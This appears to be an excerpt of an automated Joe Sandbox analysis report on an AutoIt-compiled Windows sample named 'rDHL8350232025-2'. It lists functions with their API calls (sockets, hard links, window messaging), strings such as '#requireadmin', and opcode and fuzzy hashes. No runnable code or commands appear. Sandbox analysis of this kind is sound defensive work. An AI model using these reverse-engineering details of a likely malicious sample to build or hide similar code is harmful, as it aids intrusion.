                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Variant$AllocClearCopyString
                                                                                      • String ID: *j
                                                                                      • API String ID: 2173805711-743776685
                                                                                      • Opcode ID: 5e25fe899bc25197b962d042141806cd4168299028e44f8eb10c29abbdebbfed
                                                                                      • Instruction ID: 8cfcc243ad2ddfd282dbd93ff14ef09722ecb6e1f23c561fe849f7a2e53a0696
                                                                                      • Opcode Fuzzy Hash: 5e25fe899bc25197b962d042141806cd4168299028e44f8eb10c29abbdebbfed
                                                                                      • Instruction Fuzzy Hash: 8A319172604245DFDF19AFA4E8A19FD37B5FF85304F1004A9F9038B2A2C7359916EB90
                                                                                      Function 000B304E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90networkCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 000B335B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,000B3077,?,?), ref: 000B3378
                                                                                      • inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 000B307A
                                                                                      • _wcslen.LIBCMT ref: 000B309B
                                                                                      • htons.WSOCK32(00000000,?,?,00000000), ref: 000B3106
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: ByteCharMultiWide_wcslenhtonsinet_addr
                                                                                      • String ID: 255.255.255.255
                                                                                      • API String ID: 946324512-2422070025
                                                                                      • Opcode ID: 61bfd0a999dd0a42bb62ec8791d693d400f9e881bc6bc7c423663d20e74c3975
                                                                                      • Instruction ID: 127fe75fb20fe246c2b350602370887e5abc88330a9979ee3dae01aa58c5bd6d
                                                                                      • Opcode Fuzzy Hash: 61bfd0a999dd0a42bb62ec8791d693d400f9e881bc6bc7c423663d20e74c3975
                                                                                      • Instruction Fuzzy Hash: 8531F1396002019FDB20DF28C895EEA77E4EF14318F348559E9169B392DB72EE45CB60
                                                                                      Function 000995AD Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 85COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: _wcslen
                                                                                      • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                                      • API String ID: 176396367-2734436370
                                                                                      • Opcode ID: 9c83ecbee9da92638e0ec4255a53bcb763ccc60f6aeab8fa22f01f294789558a
                                                                                      • Instruction ID: 23c89aa448047508f0bd41acb430e7c70bff1c73c61a1c03b371959c9136cddf
                                                                                      • Opcode Fuzzy Hash: 9c83ecbee9da92638e0ec4255a53bcb763ccc60f6aeab8fa22f01f294789558a
                                                                                      • Instruction Fuzzy Hash: 3221087210461166DB31AB2C9C06FFB73EC9F51310F15842EFD499B182EB91AD45E3D6
                                                                                      Function 000C37B7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 000C3840
                                                                                      • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 000C3850
                                                                                      • MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 000C3876
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$MoveWindow
                                                                                      • String ID: Listbox
                                                                                      • API String ID: 3315199576-2633736733
                                                                                      • Opcode ID: edeb58deb277bfd2ddd34762b0c4761348a37375a9b6705e23d049b26426e04c
                                                                                      • Instruction ID: d395cbe6f663a5f49a55d97b5dcb969ba84037de15fb957e6e1ce797427058ee
                                                                                      • Opcode Fuzzy Hash: edeb58deb277bfd2ddd34762b0c4761348a37375a9b6705e23d049b26426e04c
                                                                                      • Instruction Fuzzy Hash: 1A218072614218BBEB219F54DC85FBF37AEEF89750F11C118F9049B190CA75DC5187A0
                                                                                      Function 000A49F4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SetErrorMode.KERNEL32(00000001), ref: 000A4A08
                                                                                      • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 000A4A5C
                                                                                      • SetErrorMode.KERNEL32(00000000,?,?,000CCC08), ref: 000A4AD0
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorMode$InformationVolume
                                                                                      • String ID: %lu
                                                                                      • API String ID: 2507767853-685833217
                                                                                      • Opcode ID: 475c3dc51b631d7bdff0734be260a8da3bcf59f6acbeae26af14312950e290c6
                                                                                      • Instruction ID: 57507fe0cacb4307998c63ad4f6938863bfe114f42313bf142506e0b2eab8307
                                                                                      • Opcode Fuzzy Hash: 475c3dc51b631d7bdff0734be260a8da3bcf59f6acbeae26af14312950e290c6
                                                                                      • Instruction Fuzzy Hash: 7E317175A00109AFDB10DF94C885EAEBBF8EF49308F1480A9F909DB252DB75ED45CB61
                                                                                      Function 000C41EB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 000C424F
                                                                                      • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 000C4264
                                                                                      • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 000C4271
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend
                                                                                      • String ID: msctls_trackbar32
                                                                                      • API String ID: 3850602802-1010561917
                                                                                      • Opcode ID: 7f236933805ca5c63818d579f17229aac67eb5546e16ac10772908994ac3816f
                                                                                      • Instruction ID: d8d699cca7211d41a32070363a306f84b08afe3b72ba0e8eae73ad57ad30cbb4
                                                                                      • Opcode Fuzzy Hash: 7f236933805ca5c63818d579f17229aac67eb5546e16ac10772908994ac3816f
                                                                                      • Instruction Fuzzy Hash: 0911E331240208BEEF215F68CC06FAB3BACFF85B54F014118FA55E6090D271D8519B10
                                                                                      Function 00092F52 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 00036B57: _wcslen.LIBCMT ref: 00036B6A
                                                                                        • Part of subcall function 00092DA7: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00092DC5
                                                                                        • Part of subcall function 00092DA7: GetWindowThreadProcessId.USER32(?,00000000), ref: 00092DD6
                                                                                        • Part of subcall function 00092DA7: GetCurrentThreadId.KERNEL32 ref: 00092DDD
                                                                                        • Part of subcall function 00092DA7: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00092DE4
                                                                                      • GetFocus.USER32 ref: 00092F78
                                                                                        • Part of subcall function 00092DEE: GetParent.USER32(00000000), ref: 00092DF9
                                                                                      • GetClassNameW.USER32(?,?,00000100), ref: 00092FC3
                                                                                      • EnumChildWindows.USER32(?,0009303B), ref: 00092FEB
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
                                                                                      • String ID: %s%d
                                                                                      • API String ID: 1272988791-1110647743
                                                                                      • Opcode ID: 29d7ccab83c22bb2361c8790605768ee7dc15a68e1e6abb28fe670a9ec5572b5
                                                                                      • Instruction ID: 523073459d68a937e0de85b4852e807761efe5cce3e414993ebaf56ad49c1516
                                                                                      • Opcode Fuzzy Hash: 29d7ccab83c22bb2361c8790605768ee7dc15a68e1e6abb28fe670a9ec5572b5
                                                                                      • Instruction Fuzzy Hash: 8F11B171600205ABDF557F70CC99EEE77AAAF84304F048075FA099B293DF319949AF60
                                                                                      Function 000C5882 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 000C58C1
                                                                                      • SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 000C58EE
                                                                                      • DrawMenuBar.USER32(?), ref: 000C58FD
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Menu$InfoItem$Draw
                                                                                      • String ID: 0
                                                                                      • API String ID: 3227129158-4108050209
                                                                                      • Opcode ID: 35fad1976e1212aca511183226962838cc372836979818ffed6f7c17e7680a02
                                                                                      • Instruction ID: be69ffd3be8a444052006dab63c08155f640a38589d7239bf7af95f98792f77c
                                                                                      • Opcode Fuzzy Hash: 35fad1976e1212aca511183226962838cc372836979818ffed6f7c17e7680a02
                                                                                      • Instruction Fuzzy Hash: C4016D75500218EFEB619F11DC44FAFBBB8FB45362F1080A9E849D6151DB349AC4DF21
                                                                                      Function 000C7803 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 41windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetForegroundWindow.USER32(?,001018B0,000CA364,000000FC,?,00000000,00000000,?,?,?,000876CF,?,?,?,?,?), ref: 000C7805
                                                                                      • GetFocus.USER32 ref: 000C780D
                                                                                        • Part of subcall function 00049BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00049BB2
                                                                                        • Part of subcall function 00049944: GetWindowLongW.USER32(?,000000EB), ref: 00049952
                                                                                      • SendMessageW.USER32(00EFE340,000000B0,000001BC,000001C0), ref: 000C787A
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$Long$FocusForegroundMessageSend
                                                                                      • String ID: p]
                                                                                      • API String ID: 3601265619-1923361398
                                                                                      • Opcode ID: 0fad48d8d49b34b24b780c50680be0cfab661d6dd8b508db3fe4bb872dc7beab
                                                                                      • Instruction ID: cc070df4660c0822a1760de2645c1cd74262520300cd4f74fa1c4985223c8411
                                                                                      • Opcode Fuzzy Hash: 0fad48d8d49b34b24b780c50680be0cfab661d6dd8b508db3fe4bb872dc7beab
                                                                                      • Instruction Fuzzy Hash: 12018F316051009FE329DB28D858FBA33E6EF8A324F18026DE159872E1CB356C46CF81
                                                                                      Function 0009007F Relevance: 6.3, APIs: 4, Instructions: 322COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: fbfa8731ded7a8ca3392ab0e415ac7d10abb87236b7e171d5c46a51868ab7f4c
                                                                                      • Instruction ID: 0d85e05ee286b1fa357207e2934b065315db61cefeb2533adf6f420106fd87f2
                                                                                      • Opcode Fuzzy Hash: fbfa8731ded7a8ca3392ab0e415ac7d10abb87236b7e171d5c46a51868ab7f4c
                                                                                      • Instruction Fuzzy Hash: 38C12C75A00216EFDB14CFA4C894EAEB7B9FF48704F208598E905EB251D731EE41EB90
                                                                                      Function 000B342E Relevance: 6.3, APIs: 4, Instructions: 257COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Variant$ClearInitInitializeUninitialize
                                                                                      • String ID:
                                                                                      • API String ID: 1998397398-0
                                                                                      • Opcode ID: 477ba11900ac907c3489e579c58fb96267dcc74944d8000995ea2551ee86c1d3
                                                                                      • Instruction ID: 2a8f2c2791c7c124f814e4117f6a09aa34eb26c5ffeb50fd4a44948f24a7165f
                                                                                      • Opcode Fuzzy Hash: 477ba11900ac907c3489e579c58fb96267dcc74944d8000995ea2551ee86c1d3
                                                                                      • Instruction Fuzzy Hash: 12A16B756047009FCB15DF28C485EAAB7E9FF88714F148859F98A9B362DB70EE01CB91
                                                                                      Function 00090436 Relevance: 6.2, APIs: 4, Instructions: 230COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,000CFC08,?), ref: 000905F0
                                                                                      • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,000CFC08,?), ref: 00090608
                                                                                      • CLSIDFromProgID.OLE32(?,?,00000000,000CCC40,000000FF,?,00000000,00000800,00000000,?,000CFC08,?), ref: 0009062D
                                                                                      • _memcmp.LIBVCRUNTIME ref: 0009064E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: FromProg$FreeTask_memcmp
                                                                                      • String ID:
                                                                                      • API String ID: 314563124-0
                                                                                      • Opcode ID: f7ba5d67824fc699400f58f5ad11c23c5c19d667c737bd098620ed78c0a1d287
                                                                                      • Instruction ID: 2d31c36415d8ce80d66d2b699a607ebf44a1fee05075cac0e18ac6178039e8d6
                                                                                      • Opcode Fuzzy Hash: f7ba5d67824fc699400f58f5ad11c23c5c19d667c737bd098620ed78c0a1d287
                                                                                      • Instruction Fuzzy Hash: 6281F671A00109EFCF04DF94C988EEEB7B9FF89315F204598E516AB250DB71AE06DB60
                                                                                      Function 00071391 Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: _free
                                                                                      • String ID:
                                                                                      • API String ID: 269201875-0
                                                                                      • Opcode ID: 383bb29c883ced643d7462ac278eb4f73ef0357fbffa8fc016c27940bf02bf8c
                                                                                      • Instruction ID: ccc4f12569830c1e2373e1118de8637cdcf02bd5cf356ba5651a44c485707e82
                                                                                      • Opcode Fuzzy Hash: 383bb29c883ced643d7462ac278eb4f73ef0357fbffa8fc016c27940bf02bf8c
                                                                                      • Instruction Fuzzy Hash: CA414871E00501ABDB356BBC8C46AFE3AE5EF41370F248225F81DD32D3EA3C89415266
                                                                                      Function 000B1AD6 Relevance: 6.1, APIs: 4, Instructions: 138networkCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • socket.WSOCK32(00000002,00000002,00000011), ref: 000B1AFD
                                                                                      • WSAGetLastError.WSOCK32 ref: 000B1B0B
                                                                                      • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 000B1B8A
                                                                                      • WSAGetLastError.WSOCK32 ref: 000B1B94
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorLast$socket
                                                                                      • String ID:
                                                                                      • API String ID: 1881357543-0
                                                                                      • Opcode ID: 240546d734cd3f75508afdc71f2e04d158f5b180d7e9cc6296c17d9946074e7f
                                                                                      • Instruction ID: 9ca24553d255b019ba9f5cb59a98beb737b2e6ae54404a02a665defd4d0b7956
                                                                                      • Opcode Fuzzy Hash: 240546d734cd3f75508afdc71f2e04d158f5b180d7e9cc6296c17d9946074e7f
                                                                                      • Instruction Fuzzy Hash: 4341B1746002006FE720AF24C886FAA77E5EB44718F948458FA1A9F3D3D772DD418B90
                                                                                      Function 0006B41F Relevance: 6.1, APIs: 4, Instructions: 133COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 7bea6a918cfcca3bfed806a33a993de92fe72bf0bafb5040aa2562c926fb6cd6
                                                                                      • Instruction ID: f84582c5a524341afeb7efa5a6551d9c75ebc2360e0ecbf56e022dd05fe19161
                                                                                      • Opcode Fuzzy Hash: 7bea6a918cfcca3bfed806a33a993de92fe72bf0bafb5040aa2562c926fb6cd6
                                                                                      • Instruction Fuzzy Hash: 074119B1A00714BFD724AF38CC41BEABBEAEF84710F10852AF556DB2D2D77599418790
                                                                                      Function 000A56D9 Relevance: 6.1, APIs: 4, Instructions: 110fileCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 000A5783
                                                                                      • GetLastError.KERNEL32(?,00000000), ref: 000A57A9
                                                                                      • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 000A57CE
                                                                                      • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 000A57FA
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                      • String ID:
                                                                                      • API String ID: 3321077145-0
                                                                                      • Opcode ID: 11ff9685375bbcc58648b2a2a1d8bc87bbfbfaa8a464170bfb97f625748ce81f
                                                                                      • Instruction ID: 4f0ac46ae9fbf4ffc90e43080fd5970aabd977cc971a3731da5a5fe88a8ae643
                                                                                      • Opcode Fuzzy Hash: 11ff9685375bbcc58648b2a2a1d8bc87bbfbfaa8a464170bfb97f625748ce81f
                                                                                      • Instruction Fuzzy Hash: 07413E39600A10DFDB25DF55C444A5DBBE5FF49321F188488E84AAB362CB74FD01CB91
                                                                                      Function 0006D8C3 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
